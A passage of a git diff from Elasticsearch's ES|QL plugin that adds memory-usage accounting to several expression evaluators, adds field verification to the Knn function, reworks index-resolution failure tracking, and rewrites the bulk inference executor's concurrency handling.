b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/util/Delay.java @@ -7,6 +7,7 @@ package org.elasticsearch.xpack.esql.expression.function.scalar.util; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.Build; import org.elasticsearch.common.io.stream.NamedWriteableRegistry; import org.elasticsearch.common.io.stream.StreamInput; @@ -109,6 +110,8 @@ public ExpressionEvaluator.Factory toEvaluator(EvaluatorMapper.ToEvaluator toEva } static final class DelayEvaluator implements ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DelayEvaluator.class); + private final DriverContext driverContext; private final long ms; @@ -138,6 +141,11 @@ private void delay(long ms) { } } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED; + } + @Override public void close() { diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/vector/Knn.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/vector/Knn.java index ecce0b069693d..df1542a2c292c 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/vector/Knn.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/vector/Knn.java @@ -11,6 +11,8 @@ import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.index.query.QueryBuilder; +import org.elasticsearch.xpack.esql.capabilities.PostAnalysisPlanVerificationAware; +import org.elasticsearch.xpack.esql.common.Failures; import org.elasticsearch.xpack.esql.core.InvalidArgumentException; import org.elasticsearch.xpack.esql.core.expression.Expression; import org.elasticsearch.xpack.esql.core.expression.FoldContext; @@ -31,6 +33,7 @@ import org.elasticsearch.xpack.esql.expression.function.fulltext.FullTextFunction; import org.elasticsearch.xpack.esql.expression.function.fulltext.Match; import org.elasticsearch.xpack.esql.io.stream.PlanStreamInput; +import org.elasticsearch.xpack.esql.plan.logical.LogicalPlan; import org.elasticsearch.xpack.esql.planner.TranslatorHandler; import org.elasticsearch.xpack.esql.querydsl.query.KnnQuery; @@ -39,6 +42,7 @@ import java.util.List; import java.util.Map; import java.util.Objects; +import java.util.function.BiConsumer; import static java.util.Map.entry; import static org.elasticsearch.index.query.AbstractQueryBuilder.BOOST_FIELD; @@ -55,9 +59,8 @@ import static org.elasticsearch.xpack.esql.core.type.DataType.DENSE_VECTOR; import static org.elasticsearch.xpack.esql.core.type.DataType.FLOAT; import static org.elasticsearch.xpack.esql.core.type.DataType.INTEGER; -import static org.elasticsearch.xpack.esql.expression.function.fulltext.Match.getNameFromFieldAttribute; -public class Knn extends FullTextFunction implements OptionalArgument, VectorFunction { +public class Knn extends FullTextFunction implements OptionalArgument, VectorFunction, PostAnalysisPlanVerificationAware { public static final NamedWriteableRegistry.Entry ENTRY = new NamedWriteableRegistry.Entry(Expression.class, "Knn", Knn::readFrom); @@ -235,6 +238,14 @@ private Map queryOptions() throws InvalidArgumentException { return options; } + @Override + public BiConsumer postAnalysisPlanVerification() { + return (plan, failures) -> { + super.postAnalysisPlanVerification().accept(plan, failures); + fieldVerifier(plan, this, field, failures); + }; + } + @Override public Expression replaceChildren(List newChildren) { return new Knn( diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/predicate/nulls/IsNotNull.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/predicate/nulls/IsNotNull.java index 82818c5a329c0..52efaa79fd846 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/predicate/nulls/IsNotNull.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/predicate/nulls/IsNotNull.java @@ -6,6 +6,7 @@ */ package org.elasticsearch.xpack.esql.expression.predicate.nulls; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.common.io.stream.NamedWriteableRegistry; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.compute.data.Block; @@ -25,6 +26,7 @@ import org.elasticsearch.xpack.esql.core.tree.Source; import org.elasticsearch.xpack.esql.core.type.DataType; import org.elasticsearch.xpack.esql.evaluator.mapper.EvaluatorMapper; +import org.elasticsearch.xpack.esql.expression.function.Example; import org.elasticsearch.xpack.esql.expression.function.FunctionInfo; import org.elasticsearch.xpack.esql.expression.function.Param; import org.elasticsearch.xpack.esql.optimizer.rules.physical.local.LucenePushdownPredicates; @@ -54,7 +56,8 @@ public class IsNotNull extends UnaryScalarFunction implements EvaluatorMapper, N "unsigned_long", "counter_long", "counter_integer", - "counter_double" } + "counter_double" }, + examples = { @Example(file = "null", tag = "is-not-null") } ) public IsNotNull( Source source, @@ -148,6 +151,8 @@ public String toString() { record IsNotNullEvaluator(DriverContext driverContext, EvalOperator.ExpressionEvaluator field) implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(IsNotNullEvaluator.class); + @Override public Block eval(Page page) { try (Block fieldBlock = field.eval(page)) { @@ -163,6 +168,11 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } + @Override public void close() { Releasables.closeExpectNoException(field); diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/predicate/nulls/IsNull.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/predicate/nulls/IsNull.java index e93124af54186..6f91c83940b34 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/predicate/nulls/IsNull.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/predicate/nulls/IsNull.java @@ -6,6 +6,7 @@ */ package org.elasticsearch.xpack.esql.expression.predicate.nulls; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.common.io.stream.NamedWriteableRegistry; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.compute.data.Block; @@ -26,6 +27,7 @@ import org.elasticsearch.xpack.esql.core.tree.Source; import org.elasticsearch.xpack.esql.core.type.DataType; import org.elasticsearch.xpack.esql.evaluator.mapper.EvaluatorMapper; +import org.elasticsearch.xpack.esql.expression.function.Example; import org.elasticsearch.xpack.esql.expression.function.FunctionInfo; import org.elasticsearch.xpack.esql.expression.function.Param; import org.elasticsearch.xpack.esql.optimizer.rules.physical.local.LucenePushdownPredicates; @@ -51,7 +53,8 @@ public class IsNull extends UnaryScalarFunction implements EvaluatorMapper, Nega "unsigned_long", "counter_long", "counter_integer", - "counter_double" } + "counter_double" }, + examples = { @Example(file = "null", tag = "is-null") } ) public IsNull( Source source, @@ -150,6 +153,8 @@ public String toString() { record IsNullEvaluator(DriverContext driverContext, EvalOperator.ExpressionEvaluator field) implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(IsNullEvaluator.class); + @Override public Block eval(Page page) { try (Block fieldBlock = field.eval(page)) { @@ -165,6 +170,11 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } + @Override public void close() { Releasables.closeExpectNoException(field); diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/X-InEvaluator.java.st b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/X-InEvaluator.java.st index 41b9d36cd4749..9833e1510bc74 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/X-InEvaluator.java.st +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/X-InEvaluator.java.st @@ -9,6 +9,7 @@ package org.elasticsearch.xpack.esql.expression.predicate.operator.comparison; // begin generated imports import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.$Type$Block; @@ -31,6 +32,8 @@ import java.util.BitSet; * This class is generated. Edit {@code X-InEvaluator.java.st} instead. */ public class In$Name$Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(In$Name$Evaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -238,6 +241,16 @@ $endif$ return "In$Name$Evaluator[" + "lhs=" + lhs + ", rhs=" + Arrays.toString(rhs) + "]"; } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + for (EvalOperator.ExpressionEvaluator r : rhs) { + baseRamBytesUsed += r.baseRamBytesUsed(); + } + return baseRamBytesUsed; + } + @Override public void close() { Releasables.closeExpectNoException(lhs, () -> Releasables.close(rhs)); diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/index/IndexResolution.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/index/IndexResolution.java index b9040d2ef40d6..4d31f48da77de 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/index/IndexResolution.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/index/IndexResolution.java @@ -6,10 +6,10 @@ */ package org.elasticsearch.xpack.esql.index; -import org.elasticsearch.action.NoShardAvailableActionException; import org.elasticsearch.action.fieldcaps.FieldCapabilitiesFailure; import org.elasticsearch.core.Nullable; +import java.util.List; import java.util.Map; import java.util.Objects; import java.util.Set; @@ -19,33 +19,26 @@ public final class IndexResolution { /** * @param index EsIndex encapsulating requested index expression, resolved mappings and index modes from field-caps. * @param resolvedIndices Set of concrete indices resolved by field-caps. (This information is not always present in the EsIndex). - * @param unavailableShards Set of shards that were unavailable during index resolution - * @param unavailableClusters Remote clusters that could not be contacted during planning + * @param failures failures occurred during field-caps. * @return valid IndexResolution */ - public static IndexResolution valid( - EsIndex index, - Set resolvedIndices, - Set unavailableShards, - Map unavailableClusters - ) { + public static IndexResolution valid(EsIndex index, Set resolvedIndices, Map> failures) { Objects.requireNonNull(index, "index must not be null if it was found"); Objects.requireNonNull(resolvedIndices, "resolvedIndices must not be null"); - Objects.requireNonNull(unavailableShards, "unavailableShards must not be null"); - Objects.requireNonNull(unavailableClusters, "unavailableClusters must not be null"); - return new IndexResolution(index, null, resolvedIndices, unavailableShards, unavailableClusters); + Objects.requireNonNull(failures, "failures must not be null"); + return new IndexResolution(index, null, resolvedIndices, failures); } /** * Use this method only if the set of concrete resolved indices is the same as EsIndex#concreteIndices(). */ public static IndexResolution valid(EsIndex index) { - return valid(index, index.concreteIndices(), Set.of(), Map.of()); + return valid(index, index.concreteIndices(), Map.of()); } public static IndexResolution invalid(String invalid) { Objects.requireNonNull(invalid, "invalid must not be null to signal that the index is invalid"); - return new IndexResolution(null, invalid, Set.of(), Set.of(), Map.of()); + return new IndexResolution(null, invalid, Set.of(), Map.of()); } public static IndexResolution notFound(String name) { @@ -59,22 +52,19 @@ public static IndexResolution notFound(String name) { // all indices found by field-caps private final Set resolvedIndices; - private final Set unavailableShards; - // remote clusters included in the user's index expression that could not be connected to - private final Map unavailableClusters; + // map from cluster alias to failures that occurred during field-caps. + private final Map> failures; private IndexResolution( EsIndex index, @Nullable String invalid, Set resolvedIndices, - Set unavailableShards, - Map unavailableClusters + Map> failures ) { this.index = index; this.invalid = invalid; this.resolvedIndices = resolvedIndices; - this.unavailableShards = unavailableShards; - this.unavailableClusters = unavailableClusters; + this.failures = failures; } public boolean matches(String indexName) { @@ -101,11 +91,10 @@ public boolean isValid() { } /** - * @return Map of unavailable clusters (could not be connected to during field-caps query). Key of map is cluster alias, - * value is the {@link FieldCapabilitiesFailure} describing the issue. + * @return Map from cluster alias to failures that occurred during field-caps. */ - public Map unavailableClusters() { - return unavailableClusters; + public Map> failures() { + return failures; } /** @@ -115,13 +104,6 @@ public Set resolvedIndices() { return resolvedIndices; } - /** - * @return set of unavailable shards during index resolution - */ - public Set getUnavailableShards() { - return unavailableShards; - } - @Override public boolean equals(Object obj) { if (obj == null || obj.getClass() != getClass()) { @@ -131,12 +113,12 @@ public boolean equals(Object obj) { return Objects.equals(index, other.index) && Objects.equals(invalid, other.invalid) && Objects.equals(resolvedIndices, other.resolvedIndices) - && Objects.equals(unavailableClusters, other.unavailableClusters); + && Objects.equals(failures, other.failures); } @Override public int hashCode() { - return Objects.hash(index, invalid, resolvedIndices, unavailableClusters); + return Objects.hash(index, invalid, resolvedIndices, failures); } @Override @@ -152,7 +134,7 @@ public String toString() { + ", resolvedIndices=" + resolvedIndices + ", unavailableClusters=" - + unavailableClusters + + failures + '}'; } } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/inference/XContentRowEncoder.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/inference/XContentRowEncoder.java index f6c625752110a..ea1efce460558 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/inference/XContentRowEncoder.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/inference/XContentRowEncoder.java @@ -8,6 +8,7 @@ package org.elasticsearch.xpack.esql.inference; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.common.io.stream.BytesRefStreamOutput; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BlockFactory; @@ -35,6 +36,8 @@ * Extracted columns can be specified using {@link ExpressionEvaluator} */ public class XContentRowEncoder implements ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(XContentRowEncoder.class); + private final XContentType xContentType; private final BlockFactory blockFactory; private final ColumnInfoImpl[] columnsInfo; @@ -112,6 +115,15 @@ public BytesRefBlock eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + for (ExpressionEvaluator e : fieldsValueEvaluators) { + baseRamBytesUsed += e.baseRamBytesUsed(); + } + return baseRamBytesUsed; + } + public List fieldNames() { return Arrays.stream(columnsInfo).map(ColumnInfoImpl::name).collect(Collectors.toList()); } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/inference/bulk/BulkInferenceExecutionState.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/inference/bulk/BulkInferenceExecutionState.java index 55f1f49f68c21..48303be617286 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/inference/bulk/BulkInferenceExecutionState.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/inference/bulk/BulkInferenceExecutionState.java @@ -27,8 +27,8 @@ public class BulkInferenceExecutionState { private final Map bufferedResponses; private final AtomicBoolean finished = new AtomicBoolean(false); - public BulkInferenceExecutionState(int bufferSize) { - this.bufferedResponses = new ConcurrentHashMap<>(bufferSize); + public BulkInferenceExecutionState() { + this.bufferedResponses = new ConcurrentHashMap<>(); } /** @@ -125,7 +125,7 @@ public void addFailure(Exception e) { * Indicates whether the entire bulk execution is marked as finished and all responses have been successfully persisted. */ public boolean finished() { - return finished.get() && getMaxSeqNo() == getPersistedCheckpoint(); + return hasFailure() || (finished.get() && getMaxSeqNo() == getPersistedCheckpoint()); } /** diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/inference/bulk/BulkInferenceExecutor.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/inference/bulk/BulkInferenceExecutor.java index 257799962dda7..1dfedd55a39fe 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/inference/bulk/BulkInferenceExecutor.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/inference/bulk/BulkInferenceExecutor.java @@ -8,253 +8,344 @@ package org.elasticsearch.xpack.esql.inference.bulk; import org.elasticsearch.action.ActionListener; -import org.elasticsearch.common.util.concurrent.AbstractRunnable; +import org.elasticsearch.common.util.concurrent.ConcurrentCollections; import org.elasticsearch.threadpool.ThreadPool; import org.elasticsearch.xpack.core.inference.action.InferenceAction; import org.elasticsearch.xpack.esql.inference.InferenceRunner; -import org.elasticsearch.xpack.esql.plugin.EsqlPlugin; import java.util.ArrayList; import java.util.List; -import java.util.concurrent.ArrayBlockingQueue; -import java.util.concurrent.BlockingQueue; +import java.util.Queue; +import java.util.Set; +import java.util.concurrent.ConcurrentLinkedQueue; import java.util.concurrent.ExecutorService; import java.util.concurrent.Semaphore; import java.util.concurrent.atomic.AtomicBoolean; +import java.util.function.Consumer; + +import static org.elasticsearch.xpack.esql.plugin.EsqlPlugin.ESQL_WORKER_THREAD_POOL_NAME; /** * Executes a sequence of inference requests in bulk with throttling and concurrency control. */ public class BulkInferenceExecutor { - private final ThrottledInferenceRunner throttledInferenceRunner; - private final BulkInferenceExecutionConfig bulkExecutionConfig; + private final InferenceRunner inferenceRunner; + private final Semaphore permits; + private final ExecutorService executorService; + + /** + * Custom concurrent queue that prevents duplicate bulk requests from being queued. + *

+ * This queue implementation ensures fairness among multiple concurrent bulk operations + * by preventing the same bulk request from being queued multiple times. It uses a + * backing concurrent set to track which requests are already queued. + *

+ */ + private final Queue pendingBulkRequests = new ConcurrentLinkedQueue<>() { + private final Set requests = ConcurrentCollections.newConcurrentSet(); + + @Override + public boolean offer(BulkInferenceRequest bulkInferenceRequest) { + synchronized (requests) { + if (requests.add(bulkInferenceRequest)) { + return super.offer(bulkInferenceRequest); + } + return false; // Already exists, don't add duplicate + } + } + + @Override + public BulkInferenceRequest poll() { + synchronized (requests) { + BulkInferenceRequest request = super.poll(); + if (request != null) { + requests.remove(request); + } + return request; + } + } + }; /** * Constructs a new {@code BulkInferenceExecutor}. * - * @param inferenceRunner The inference runner used to execute individual inference requests. - * @param threadPool The thread pool for executing inference tasks. - * @param bulkExecutionConfig Configuration options (throttling and concurrency limits). + * @param inferenceRunner The inference runner used to execute individual inference requests. + * @param threadPool The thread pool for executing inference tasks. + * @param bulkExecutionConfig Configuration options (throttling and concurrency limits). */ public BulkInferenceExecutor(InferenceRunner inferenceRunner, ThreadPool threadPool, BulkInferenceExecutionConfig bulkExecutionConfig) { - this.throttledInferenceRunner = ThrottledInferenceRunner.create(inferenceRunner, executorService(threadPool), bulkExecutionConfig); - this.bulkExecutionConfig = bulkExecutionConfig; + this.inferenceRunner = inferenceRunner; + this.permits = new Semaphore(bulkExecutionConfig.maxOutstandingRequests()); + this.executorService = threadPool.executor(ESQL_WORKER_THREAD_POOL_NAME); } /** - * Executes the provided bulk inference requests. - *

- * Each request is sent to the {@link ThrottledInferenceRunner} to be executed. - * The final listener is notified with all successful responses once all requests are completed. + * Executes multiple inference requests in bulk and collects all responses. * - * @param requests An iterator over the inference requests to be executed. - * @param listener A listener notified with the complete list of responses or a failure. + * @param requests An iterator over the inference requests to execute + * @param listener Called with the list of all responses in request order */ public void execute(BulkInferenceRequestIterator requests, ActionListener> listener) { + List responses = new ArrayList<>(); + execute(requests, responses::add, ActionListener.wrap(ignored -> listener.onResponse(responses), listener::onFailure)); + } + + /** + * Executes multiple inference requests in bulk with streaming response handling. + *

+ * This method orchestrates the entire bulk inference process: + * 1. Creates execution state to track progress and responses + * 2. Sets up response handling pipeline + * 3. Initiates asynchronous request processing + *

+ * + * @param requests An iterator over the inference requests to execute + * @param responseConsumer Called for each successful inference response as they complete + * @param completionListener Called when all requests are complete or if any error occurs + */ + public void execute( + BulkInferenceRequestIterator requests, + Consumer responseConsumer, + ActionListener completionListener + ) { if (requests.hasNext() == false) { - listener.onResponse(List.of()); + completionListener.onResponse(null); return; } - final BulkInferenceExecutionState bulkExecutionState = new BulkInferenceExecutionState( - bulkExecutionConfig.maxOutstandingRequests() - ); - final ResponseHandler responseHandler = new ResponseHandler(bulkExecutionState, listener, requests.estimatedSize()); - - while (bulkExecutionState.finished() == false && requests.hasNext()) { - InferenceAction.Request request = requests.next(); - long seqNo = bulkExecutionState.generateSeqNo(); - - if (requests.hasNext() == false) { - bulkExecutionState.finish(); - } - - ActionListener inferenceResponseListener = ActionListener.runAfter( - ActionListener.wrap( - r -> bulkExecutionState.onInferenceResponse(seqNo, r), - e -> bulkExecutionState.onInferenceException(seqNo, e) - ), - responseHandler::persistPendingResponses - ); - - if (request == null) { - inferenceResponseListener.onResponse(null); - } else { - throttledInferenceRunner.doInference(request, inferenceResponseListener); - } - } + new BulkInferenceRequest(requests, responseConsumer, completionListener).executePendingRequests(); } /** - * Handles collection and delivery of inference responses once they are complete. + * Encapsulates the execution state and logic for a single bulk inference operation. + *

+ * This inner class manages the complete lifecycle of a bulk inference request, including: + * - Request iteration and permit-based concurrency control + * - Asynchronous execution with hybrid recursion strategy + * - Response collection and ordering via execution state + * - Error handling and completion notification + *

+ *

+ * Each BulkInferenceRequest instance represents one bulk operation that may contain + * multiple individual inference requests. Multiple BulkInferenceRequest instances + * can execute concurrently, with fairness ensured through the pending queue mechanism. + *

*/ - private static class ResponseHandler { - private final List responses; - private final ActionListener> listener; - private final BulkInferenceExecutionState bulkExecutionState; + private class BulkInferenceRequest { + private final BulkInferenceRequestIterator requests; + private final Consumer responseConsumer; + private final ActionListener completionListener; + + private final BulkInferenceExecutionState executionState = new BulkInferenceExecutionState(); private final AtomicBoolean responseSent = new AtomicBoolean(false); - private ResponseHandler( - BulkInferenceExecutionState bulkExecutionState, - ActionListener> listener, - int estimatedSize + BulkInferenceRequest( + BulkInferenceRequestIterator requests, + Consumer responseConsumer, + ActionListener completionListener ) { - this.listener = listener; - this.bulkExecutionState = bulkExecutionState; - this.responses = new ArrayList<>(estimatedSize); + this.requests = requests; + this.responseConsumer = responseConsumer; + this.completionListener = completionListener; } /** - * Persists all buffered responses that can be delivered in order, and sends the final response if all requests are finished. + * Attempts to poll the next request from the iterator and acquire a permit for execution. + *

+ * Because multiple threads may call this concurrently via async callbacks, this method is synchronized to ensure thread-safe access + * to the request iterator. + *

+ * + * @return A BulkRequestItem if a request and permit are available, null otherwise */ - public synchronized void persistPendingResponses() { - long persistedSeqNo = bulkExecutionState.getPersistedCheckpoint(); - - while (persistedSeqNo < bulkExecutionState.getProcessedCheckpoint()) { - persistedSeqNo++; - if (bulkExecutionState.hasFailure() == false) { - try { - InferenceAction.Response response = bulkExecutionState.fetchBufferedResponse(persistedSeqNo); - responses.add(response); - } catch (Exception e) { - bulkExecutionState.addFailure(e); - } + private BulkRequestItem pollPendingRequest() { + synchronized (requests) { + if (requests.hasNext()) { + return new BulkRequestItem(executionState.generateSeqNo(), requests.next()); } - bulkExecutionState.markSeqNoAsPersisted(persistedSeqNo); } - sendResponseOnCompletion(); + return null; } /** - * Sends the final response or failure once all inference tasks have completed. + * Main execution loop that processes inference requests asynchronously with hybrid recursion strategy. + *

+ * This method implements a continuation-based asynchronous pattern with the following features: + * - Queue-based fairness: Multiple bulk requests can be queued and processed fairly + * - Permit-based concurrency control: Limits concurrent inference requests using semaphores + * - Hybrid recursion strategy: Uses direct recursion for performance up to 100 levels, + * then switches to executor-based continuation to prevent stack overflow + * - Duplicate prevention: Custom queue prevents the same bulk request from being queued multiple times + *

+ *

+ * Execution flow: + * 1. Attempts to acquire a permit for concurrent execution + * 2. If no permit available, queues this bulk request for later execution + * 3. Polls for the next available request from the iterator + * 4. If no requests available, schedules the next queued bulk request + * 5. Executes the request asynchronously with proper continuation handling + * 6. Uses hybrid recursion: direct calls up to 100 levels, executor-based beyond that + *

+ *

+ * The loop terminates when: + * - No more requests are available and no permits can be acquired + * - The bulk execution is marked as finished (due to completion or failure) + * - An unrecoverable error occurs during processing + *

*/ - private void sendResponseOnCompletion() { - if (bulkExecutionState.finished() && responseSent.compareAndSet(false, true)) { - if (bulkExecutionState.hasFailure() == false) { - try { - listener.onResponse(responses); + private void executePendingRequests() { + executePendingRequests(0); + } + + private void executePendingRequests(int recursionDepth) { + try { + while (executionState.finished() == false) { + if (permits.tryAcquire() == false) { + if (requests.hasNext()) { + pendingBulkRequests.add(this); + } return; - } catch (Exception e) { - bulkExecutionState.addFailure(e); - } - } + } else { + BulkRequestItem bulkRequestItem = pollPendingRequest(); - listener.onFailure(bulkExecutionState.getFailure()); - } - } - } + if (bulkRequestItem == null) { + // No more requests available + // Release the permit we didn't used and stop processing + permits.release(); - /** - * Manages throttled inference tasks execution. - */ - private static class ThrottledInferenceRunner { - private final InferenceRunner inferenceRunner; - private final ExecutorService executorService; - private final BlockingQueue pendingRequestsQueue; - private final Semaphore permits; - - private ThrottledInferenceRunner(InferenceRunner inferenceRunner, ExecutorService executorService, int maxRunningTasks) { - this.executorService = executorService; - this.permits = new Semaphore(maxRunningTasks); - this.inferenceRunner = inferenceRunner; - this.pendingRequestsQueue = new ArrayBlockingQueue<>(maxRunningTasks); - } + // Check if another bulk request is pending for execution. + BulkInferenceRequest nexBulkRequest = pendingBulkRequests.poll(); - /** - * Creates a new {@code ThrottledInferenceRunner} with the specified configuration. - * - * @param inferenceRunner TThe inference runner used to execute individual inference requests. - * @param executorService The executor used for asynchronous execution. - * @param bulkExecutionConfig Configuration options (throttling and concurrency limits). - */ - public static ThrottledInferenceRunner create( - InferenceRunner inferenceRunner, - ExecutorService executorService, - BulkInferenceExecutionConfig bulkExecutionConfig - ) { - return new ThrottledInferenceRunner(inferenceRunner, executorService, bulkExecutionConfig.maxOutstandingRequests()); - } + while (nexBulkRequest == this) { + nexBulkRequest = pendingBulkRequests.poll(); + } - /** - * Schedules the inference task for execution. If a permit is available, the task runs immediately; otherwise, it is queued. - * - * @param request The inference request. - * @param listener The listener to notify on response or failure. - */ - public void doInference(InferenceAction.Request request, ActionListener listener) { - enqueueTask(request, listener); - executePendingRequests(); - } + if (nexBulkRequest != null) { + executorService.execute(nexBulkRequest::executePendingRequests); + } - /** - * Attempts to execute as many pending inference tasks as possible, limited by available permits. - */ - private void executePendingRequests() { - while (permits.tryAcquire()) { - AbstractRunnable task = pendingRequestsQueue.poll(); + return; + } - if (task == null) { - permits.release(); - return; - } + if (requests.hasNext() == false) { + // This is the last request - mark bulk execution as finished + // to prevent further processing attempts + executionState.finish(); + } - try { - executorService.execute(task); - } catch (Exception e) { - task.onFailure(e); - permits.release(); + final ActionListener inferenceResponseListener = ActionListener.runAfter( + ActionListener.wrap( + r -> executionState.onInferenceResponse(bulkRequestItem.seqNo(), r), + e -> executionState.onInferenceException(bulkRequestItem.seqNo(), e) + ), + () -> { + // Release the permit we used + permits.release(); + + try { + synchronized (executionState) { + persistPendingResponses(); + } + + if (executionState.finished() && responseSent.compareAndSet(false, true)) { + onBulkCompletion(); + } + + if (responseSent.get()) { + // Response has already been sent + // No need to continue processing this bulk. + // Check if another bulk request is pending for execution. + BulkInferenceRequest nexBulkRequest = pendingBulkRequests.poll(); + if (nexBulkRequest != null) { + executorService.execute(nexBulkRequest::executePendingRequests); + } + return; + } + if (executionState.finished() == false) { + // Execute any pending requests if any + if (recursionDepth > 100) { + executorService.execute(this::executePendingRequests); + } else { + this.executePendingRequests(recursionDepth + 1); + } + } + } catch (Exception e) { + if (responseSent.compareAndSet(false, true)) { + completionListener.onFailure(e); + } + } + } + ); + + // Handle null requests (edge case in some iterators) + if (bulkRequestItem.request() == null) { + inferenceResponseListener.onResponse(null); + return; + } + + // Execute the inference request with proper origin context + inferenceRunner.doInference(bulkRequestItem.request(), inferenceResponseListener); + } } + } catch (Exception e) { + executionState.addFailure(e); } } /** - * Add an inference task to the queue. - * - * @param request The inference request. - * * @param listener The listener to notify on response or failure. + * Processes and delivers buffered responses in order, ensuring proper sequencing. + *

+ * This method is synchronized to ensure thread-safe access to the execution state + * and prevent concurrent response processing which could cause ordering issues. + * Processing stops immediately if a failure is detected to implement fail-fast behavior. + *

*/ - private void enqueueTask(InferenceAction.Request request, ActionListener listener) { - try { - pendingRequestsQueue.put(createTask(request, listener)); - } catch (Exception e) { - listener.onFailure(new IllegalStateException("An error occurred while adding the inference request to the queue", e)); + private void persistPendingResponses() { + long persistedSeqNo = executionState.getPersistedCheckpoint(); + + while (persistedSeqNo < executionState.getProcessedCheckpoint()) { + persistedSeqNo++; + if (executionState.hasFailure() == false) { + try { + InferenceAction.Response response = executionState.fetchBufferedResponse(persistedSeqNo); + responseConsumer.accept(response); + } catch (Exception e) { + executionState.addFailure(e); + } + } + executionState.markSeqNoAsPersisted(persistedSeqNo); } } /** - * Wraps an inference request into an {@link AbstractRunnable} that releases its permit on completion and triggers any remaining - * queued tasks. - * - * @param request The inference request. - * @param listener The listener to notify on completion. - * @return A runnable task encapsulating the request. + * Call the completion listener when all requests have completed. */ - private AbstractRunnable createTask(InferenceAction.Request request, ActionListener listener) { - final ActionListener completionListener = ActionListener.runAfter(listener, () -> { - permits.release(); - executePendingRequests(); - }); - - return new AbstractRunnable() { - @Override - protected void doRun() { - try { - inferenceRunner.doInference(request, completionListener); - } catch (Throwable e) { - listener.onFailure(new RuntimeException("Unexpected failure while running inference", e)); - } + private void onBulkCompletion() { + if (executionState.hasFailure() == false) { + try { + completionListener.onResponse(null); + return; + } catch (Exception e) { + executionState.addFailure(e); } + } - @Override - public void onFailure(Exception e) { - completionListener.onFailure(e); - } - }; + completionListener.onFailure(executionState.getFailure()); } } - private static ExecutorService executorService(ThreadPool threadPool) { - return threadPool.executor(EsqlPlugin.ESQL_WORKER_THREAD_POOL_NAME); + /** + * Encapsulates an inference request with its associated sequence number. + *

+ * The sequence number is used for ordering responses and tracking completion + * in the bulk execution state. + *

